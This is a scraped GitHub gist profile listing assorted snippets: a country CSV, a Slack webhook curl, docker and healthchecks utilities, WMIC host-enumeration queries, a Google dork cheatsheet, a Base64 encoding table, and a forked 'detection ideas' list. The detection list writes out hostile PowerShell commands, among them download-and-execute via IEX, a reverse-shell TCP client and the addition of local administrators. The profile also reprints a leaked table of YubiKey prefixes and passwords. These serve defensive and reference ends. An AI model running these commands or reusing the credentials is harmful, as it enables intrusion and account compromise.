Skip to content

Instantly share code, notes, and snippets.

View kaywoz's full-sized avatar

ka kaywoz

  • between a hard place and a nightmarish hellscape....
  • X @Morna666
View GitHub Profile
@kaywoz
kaywoz / Countries.csv
Last active May 27, 2024 09:20
Countries
name alpha2 group
Afghanistan AF RoW
Albania AL RoW
Algeria DZ RoW
American Samoa AS RoW
Andorra AD RoW
Angola AO RoW
Anguilla AI RoW
Antarctica AQ RoW
Antigua And Barbuda AG RoW
curl -X POST \
-H 'Content-type: application/json; charset=utf-8' \
--data '{ "channel": "#mychannel", "username": "superbot", "icon_emoji": ":bot:", "text": "Foo" }' \
https://hooks.slack.com/services/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
@kaywoz
kaywoz / dockercontainerips.sh
Last active May 13, 2024 17:43
get all docker container ip's
docker ps -q | xargs -n 1 docker inspect --format '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}} {{ .Name }}' | sed 's/ \// /'
@kaywoz
kaywoz / healthchecks-import.py
Last active April 3, 2024 14:31
import healthchecks.io to another via api
import requests
SOURCE_API_URL = "https://healthchecks.io/api/v1/checks/"
TARGET_API_URL = "http://0.0.0.0:8000/api/v1/checks/"
SOURCE_PROJECT_READONLY_KEY = "SOURCE_API_KEY_READONLY"
TARGET_PROJECT_KEY = "TARGET_API_KEY"
r = requests.get(SOURCE_API_URL, headers={"X-Api-Key": SOURCE_PROJECT_READONLY_KEY})
for check in r.json()["checks"]:
print("Cloning %s" % check["name"])
@kaywoz
kaywoz / mtgox-yubikey.txt
Last active April 21, 2023 07:58 — forked from roycewilliams/mtgox-yubikey.txt
mtgox-yubikey.txt
# Mirror of: https://jenda.hrach.eu/f2/mtgox-yubikey.txt
#
# both slots worked for my 2012 yubikey, now has more worth than a paperweight but barely... ;-)
#
Yubikey Prefix Password
======= ====== ========
123456A d2868706da69 32e193d3e932
123456B cf0d9f4b8d2b d4deb686e7bc
720950A 24be0d14cc04 59e6fbe1f79f
720950B 82984359457f d7eeebf6d70d
@kaywoz
kaywoz / ideas.txt
Created January 30, 2023 14:09 — forked from JohnLaTwC/ideas.txt
Detection ideas
// suspicious PowerShell commands contacting URLs, adding admins, receiving commands
powershell -w 1 -exec bypass -e aQBlAH… --> "iex (("
powershell.exe -c $admins = ([System.Security.Principal.SecurityIdentifier]'S-1-5-32-544').Translate( [System.Security.Principal.NTAccount]).Value;$parts = $admins -split '\';$groupname = $parts[-1];Add-LocalGroupMember -Group $groupname -Member "...
powershell.exe -nop -c "$client = New-Object System.Net.Sockets.TCPClient('.
powershell -exec bypass -C "IEX (New-Object Net.Webclient).downloadstring(\" <ipv4>:<port>\")"
powershell.exe /c Get-WmiObject Win32_ComputerSystemProduct | Select-Object UUID
powershell.exe /c Get-WmiObject Win32_bios | Select-Object SerialNumber
powershell.exe /c Get-WmiObject Win32_PhysicalMedia | Select-Object SerialNumber
C:\Windows\system32\cmd.exe /c powershell -Command "copy \\server\share\procdump.exe C:\dump.exe"
@kaywoz
kaywoz / wmic_cmds.txt
Created December 8, 2022 12:45 — forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@kaywoz
kaywoz / GoogleDorking.md
Created June 29, 2022 10:30 — forked from sundowndev/GoogleDorking.md
Google dork cheatsheet

Google dork cheatsheet

Search filters

Filter Description Example
allintext Searches for occurrences of all the keywords given. allintext:"keyword"
intext Searches for the occurrences of keywords all at once or one at a time. intext:"keyword"
inurl Searches for a URL matching one of the keywords. inurl:"keyword"
allinurl Searches for a URL matching all the keywords in the query. allinurl:"keyword"
intitle Searches for occurrences of keywords in title all or one. intitle:"keyword"
@kaywoz
kaywoz / Base64_CheatSheet.md
Created May 25, 2022 19:58 — forked from Neo23x0/Base64_CheatSheet.md
Learning Aid - Top Base64 Encodings Table

Learning Aid - Top Base64 Encodings Table

Base64 Code Mnemonic Aid Decoded* Description
JAB 🗣 Jabber $. Variable declaration (UTF-16)
TVq 📺 Television MZ MZ header
SUVY 🚙 SUV IEX PowerShell Invoke Expression
SQBFAF 🐣 Squab favorite I.E. PowerShell Invoke Expression (UTF-16)
SQBuAH 🐣 Squab uahhh I.n. PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz
PAA 💪 "Pah!" &lt;. Often used by Emotet (UTF-16)
@kaywoz
kaywoz / settings.json
Created February 27, 2022 19:15
wsl settings.json for some 4 different terminals with some themes etc.
{
"$schema": "https://aka.ms/terminal-profiles-schema",
"actions":
[
{
"command":
{
"action": "copy",
"singleLine": false
},